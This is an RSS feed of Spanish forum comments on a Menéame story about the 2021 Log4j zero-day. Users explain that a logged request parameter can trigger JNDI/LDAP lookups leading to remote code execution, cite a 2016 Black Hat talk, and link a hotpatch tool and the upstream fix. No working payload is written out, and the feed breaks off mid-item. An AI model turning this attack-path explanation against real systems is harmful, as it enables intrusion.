<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:meneame="http://meneame.net/faq-es.php"
 >
<channel>
	<title>Menéame: comentarios [3594248]</title>
	<link>http://www.meneame.net</link>
	<image><title>www.meneame.net</title><link>http://www.meneame.net</link><url>http://cdn.mnmstatic.net/img/mnm/eli-rss.png</url></image>
	<description>Sitio colaborativo de publicación y comunicación entre blogs</description>
	<pubDate>Mon, 13 Dec 2021 16:14:02 +0000</pubDate>
	<generator>http://blog.meneame.net/</generator>
	<language>es</language>
	<item>
		<meneame:comment_id>34535399</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>79</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#79 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c079#c-79</link>
		<pubDate>Mon, 13 Dec 2021 16:14:02 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c079#c-79</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-77" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c077#c-77" rel="nofollow">#77</a> Hola. Aunque es verdad que lo que describes era posible con antiguas versiones de OpenJDK, ese no es el caso en versiones de OpenJDK desde hace varios años, y otras alternativas tienen que ser utilizadas</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34534567</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>78</meneame:order>
		<meneame:user>mre13185</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#78 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c078#c-78</link>
		<pubDate>Mon, 13 Dec 2021 13:31:56 +0000</pubDate>
		<dc:creator>mre13185</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c078#c-78</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-69" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c069#c-69" rel="nofollow">#69</a> No, ya la probé en su día y era muy engorroso, así que uso la que viene por defecto, logback.</p><p>&#187;&nbsp;autor: <strong>mre13185</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34533630</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>77</meneame:order>
		<meneame:user>EmuAGR</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#77 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c077#c-77</link>
		<pubDate>Mon, 13 Dec 2021 11:31:47 +0000</pubDate>
		<dc:creator>EmuAGR</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c077#c-77</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-75" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c075#c-75" rel="nofollow">#75</a> Ejecuta una clase que se baja de un servidor LDAP. Los programadores en Java están obsesionados con las RPC en vez de usar APIs. Si total, el rendimiento no es lo mejor de Java...</p><p>&#187;&nbsp;autor: <strong>EmuAGR</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34532073</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>76</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>34</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#76 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c076#c-76</link>
		<pubDate>Mon, 13 Dec 2021 07:38:11 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c076#c-76</guid>
		<description><![CDATA[<p>Dudo que quede alguien leyendo por aqui, pero esta es una herramienta publicada por el equipo de AWS Corretto (del que formo parte) que permite parchear esta vulnerabilidad en caliente, sin reiniciar la maquina virtual de java:<br />
<a href="https://github.com/corretto/hotpatch-for-apache-log4j2" title="github.com/corretto/hotpatch-for-apache-log4j2" rel="nofollow">github.com/corretto/hotpatch-for-apache-log4j2</a></p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34532050</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>75</meneame:order>
		<meneame:user>Razhan</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#75 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c075#c-75</link>
		<pubDate>Mon, 13 Dec 2021 07:33:45 +0000</pubDate>
		<dc:creator>Razhan</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c075#c-75</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-73" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c073#c-73" rel="nofollow">#73</a> No, log4j no ejecuta lo que se ha logeado. Log4j no tiene algo tipo ${exec:&#60;my_command&#62;}, esta vulnerabilidad es grave, pero no es tan clara.</p><p>&#187;&nbsp;autor: <strong>Razhan</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34532038</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>74</meneame:order>
		<meneame:user>Razhan</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>15</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#74 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c074#c-74</link>
		<pubDate>Mon, 13 Dec 2021 07:31:38 +0000</pubDate>
		<dc:creator>Razhan</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c074#c-74</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-72" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c072#c-72" rel="nofollow">#72</a> Esta vulnerabilidad consta de dos partes. Una de ellas es lo que Alvaro presento en 2016, pero por si sola no es suficiente. Su presentacion demostro que una injeccion de jndi se puede escalar hasta una ejecucion de codigo remoto. Pero todavia necesitas alguna forma de hacer que Java se conecte a tu servidor.<br />
<br />
Log4j no solo lo hizo posible, sino que puede considerarse que lo hizo trivial</p><p>&#187;&nbsp;autor: <strong>Razhan</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34527197</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>73</meneame:order>
		<meneame:user>EmuAGR</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#73 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c073#c-73</link>
		<pubDate>Sun, 12 Dec 2021 08:58:14 +0000</pubDate>
		<dc:creator>EmuAGR</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c073#c-73</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-72" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c072#c-72" rel="nofollow">#72</a> No es lo mismo, la vulnerabilidad aquí no es exactamente la ejecución por LDAP, sino que el Log ejecuta lo que es logueado.</p><p>&#187;&nbsp;autor: <strong>EmuAGR</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34526337</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>72</meneame:order>
		<meneame:user>PussyLover</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>22</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#72 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c072#c-72</link>
		<pubDate>Sat, 11 Dec 2021 23:49:50 +0000</pubDate>
		<dc:creator>PussyLover</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c072#c-72</guid>
		<description><![CDATA[<p>Lo fuerte de todo esto es que en 2016, el español Álvaro Muñoz ya expuso esta vulnerabilidad en un Black Hat de 2016.<br />
<br />
En este Tweet un pequeño vídeo de su presentación: <a href="https://twitter.com/HaboubiAnis/status/1469714216407998475" title="twitter.com/HaboubiAnis/status/1469714216407998475" rel="nofollow">twitter.com/HaboubiAnis/status/1469714216407998475</a><br />
<br />
Y aquí el PDF con su presentación: <a href="https://blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" title="blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" rel="nofollow">blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP</a></p><p>&#187;&nbsp;autor: <strong>PussyLover</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34526329</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>71</meneame:order>
		<meneame:user>PussyLover</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>8</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#71 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c071#c-71</link>
		<pubDate>Sat, 11 Dec 2021 23:48:07 +0000</pubDate>
		<dc:creator>PussyLover</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c071#c-71</guid>
		<description><![CDATA[<p><a href="https://github.com/apache/logging-log4j2/pull/608" title="github.com/apache/logging-log4j2/pull/608" rel="nofollow">github.com/apache/logging-log4j2/pull/608</a></p><p>&#187;&nbsp;autor: <strong>PussyLover</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34525832</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>70</meneame:order>
		<meneame:user>--689577--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#70 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c070#c-70</link>
		<pubDate>Sat, 11 Dec 2021 22:08:27 +0000</pubDate>
		<dc:creator>--689577--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c070#c-70</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-68" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c068#c-68" rel="nofollow">#68</a> Mejor asumir que me explico realmente mal y dejarlo aquí.</p><p>&#187;&nbsp;autor: <strong>--689577--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34524119</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>69</meneame:order>
		<meneame:user>Razhan</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#69 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c069#c-69</link>
		<pubDate>Sat, 11 Dec 2021 16:12:09 +0000</pubDate>
		<dc:creator>Razhan</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c069#c-69</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-64" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c064#c-64" rel="nofollow">#64</a> Slf4j es solo una api de logging, por debajo sigues necesitando tener una implementación. Si la implementación es log4j2, seguirías teniendo problemas</p><p>&#187;&nbsp;autor: <strong>Razhan</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34523339</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>68</meneame:order>
		<meneame:user>--419859--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>14</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#68 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c068#c-68</link>
		<pubDate>Sat, 11 Dec 2021 13:32:35 +0000</pubDate>
		<dc:creator>--419859--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c068#c-68</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-65" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c065#c-65" rel="nofollow">#65</a> Todavía no veo en tus comentarios nada que no sean castillos en el aire, y nada que sea una alternativa real, por lo que asumiré que te explicas realmente mal.</p><p>&#187;&nbsp;autor: <strong>--419859--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34523184</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>67</meneame:order>
		<meneame:user>Mschumacher</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#67 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c067#c-67</link>
		<pubDate>Sat, 11 Dec 2021 13:03:57 +0000</pubDate>
		<dc:creator>Mschumacher</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c067#c-67</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-45" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c045#c-45" rel="nofollow">#45</a> pero digo  que no es relevante el sistema operativo, es una librería de Java</p><p>&#187;&nbsp;autor: <strong>Mschumacher</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34522566</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>66</meneame:order>
		<meneame:user>--94561--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#66 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c066#c-66</link>
		<pubDate>Sat, 11 Dec 2021 11:36:00 +0000</pubDate>
		<dc:creator>--94561--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c066#c-66</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-58" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c058#c-58" rel="nofollow">#58</a> Tal cual. Lo peor es q estara en el repo <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>--94561--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34522231</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>65</meneame:order>
		<meneame:user>--689577--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#65 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c065#c-65</link>
		<pubDate>Sat, 11 Dec 2021 10:44:11 +0000</pubDate>
		<dc:creator>--689577--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c065#c-65</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-41" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c041#c-41" rel="nofollow">#41</a> Bueno, por los comentarios que pones directamente asumes que soy tonto de remate o uno de esos del palillo en la boca que apenas ha conseguido programar algo en basic (uffff.... “print”.... ezo  ke eeeeee!?!?). También denoto una cierta respuesta a la defensiva como si mi comentario fuera un ataque a las librerías/módulos/etc y no... por ahi no van los tiros sino que, al contrario, lo que pretendo comunicar (pobremente?...) con mi comentario es que hay que ponerse manos a la obra para crear una nueva solución, fusionando el hardware y software, que quite toda esta complejidad y por ende la mayoría de los vectores de ataque.<br />
<br />
Hago este comentario basándome en más de 7 años de I+D en el más bajo nivel en el Kernel de Linux; mi mundo discurre en los uS (microsegundos), en la gestión avanzada de threads en el scheduler, en el control de frecuencias en multinucleo y en la optimización de la estrategia idle de cada núcleo entre otras cosas.<br />
También me dedico al tema ML y soy perfectamente consciente que sin todas esas fantásticas librerías no podría programar de forma simple en los distintos lenguajes como por ejemplo python.<br />
<br />
Espero no haber soltado un tostón y buen finde!</p><p>&#187;&nbsp;autor: <strong>--689577--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34521675</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>64</meneame:order>
		<meneame:user>mre13185</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#64 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c064#c-64</link>
		<pubDate>Sat, 11 Dec 2021 09:07:54 +0000</pubDate>
		<dc:creator>mre13185</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c064#c-64</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-3" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c03#c-3" rel="nofollow">#3</a> El caso es que Github hace unas semanas me saltó la alarma en una app, no sé si sería por esto. Como para estas cosas lo manejo con lombok y las llamadas a log las tengo centralizadas con una clase de utilidad no me costó mucho corregir la vulnerabilidad, sólo cambiar la anotación de <a class='tooltip u:Log4j' href='/user/Log4j'>@Log4j</a> a <a class='tooltip u:Slf4j' href='/user/Slf4j'>@Slf4j</a> en dicha clase.</p><p>&#187;&nbsp;autor: <strong>mre13185</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34521514</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>63</meneame:order>
		<meneame:user>inovercy</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>26</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#63 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c063#c-63</link>
		<pubDate>Sat, 11 Dec 2021 08:45:15 +0000</pubDate>
		<dc:creator>inovercy</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c063#c-63</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-33" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c033#c-33" rel="nofollow">#33</a> Es una biblioteca que provee de facilidades al programador para escribir logs de su aplicación, da igual la plataforma, windows, linux, mac o lo que sea. Estés programando lo que estés programando.<br />
<br />
Luego hay un problema de concepto sobre qué es un servidor. Cuando hablas de servidor linux/windows (windows también tiene una versión para servidores) estás hablando de un servidor &#34;fisico&#34; que corre un SO. Pero también se llaman servidores a aplicaciones que escuchan peticiones de un cliente. Digamos que tú podrías tener un servidor windows/linux con varias aplicaciones de tipo servidor corriendo dentro de este. Por ejemplo un servidor de base de datos (SQLServer corre en windows, por ejemplo) y muchos de estos servidores son susceptibles de usar log4j, independientemente del SO donde corran.</p><p>&#187;&nbsp;autor: <strong>inovercy</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34521429</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>62</meneame:order>
		<meneame:user>warheart</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#62 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c062#c-62</link>
		<pubDate>Sat, 11 Dec 2021 08:33:12 +0000</pubDate>
		<dc:creator>warheart</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c062#c-62</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-43" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c043#c-43" rel="nofollow">#43</a> <a class="tooltip c:3594248-42" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c042#c-42" rel="nofollow">#42</a> no sé si habéis entendido bien la vulnerabilidad. El problema es que tú puedes tener un servicio REST expuesto (127.0.0.1/servicio/p) que recibe un parámetro p y hace un log.error(&#34;El parámetro &#34; + p + &#34; no es válido&#34;);<br />
<br />
Si en ese parámetro alguien manda la cadena del exploit, explota la vulnerabilidad. En el primer enlace de <a class="tooltip c:3594248-3" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c03#c-3" rel="nofollow">#3</a> se ve perfectamente.</p><p>&#187;&nbsp;autor: <strong>warheart</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34521296</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>61</meneame:order>
		<meneame:user>--453660--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#61 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c061#c-61</link>
		<pubDate>Sat, 11 Dec 2021 08:01:47 +0000</pubDate>
		<dc:creator>--453660--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c061#c-61</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-40" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c040#c-40" rel="nofollow">#40</a> es que no debería haber nada de Java de cara en partes públicas de sistemas distribuidos. Es un lenguaje backend y precisamente tener MVCs y monolitos expone a todo un mundo de vulnerabilidades. <br />
<br />
Pero sí, estoy de acuerdo con lo que dices y no hay que dejar ningún frente abierto.</p><p>&#187;&nbsp;autor: <strong>--453660--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520971</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>60</meneame:order>
		<meneame:user>Razhan</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#60 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c060#c-60</link>
		<pubDate>Sat, 11 Dec 2021 02:51:50 +0000</pubDate>
		<dc:creator>Razhan</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c060#c-60</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-16" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c016#c-16" rel="nofollow">#16</a> Si, el jueves, se publico ayer. Algunos llevamos mas de 24 horas con esto</p><p>&#187;&nbsp;autor: <strong>Razhan</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34520965</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>59</meneame:order>
		<meneame:user>Razhan</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#59 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
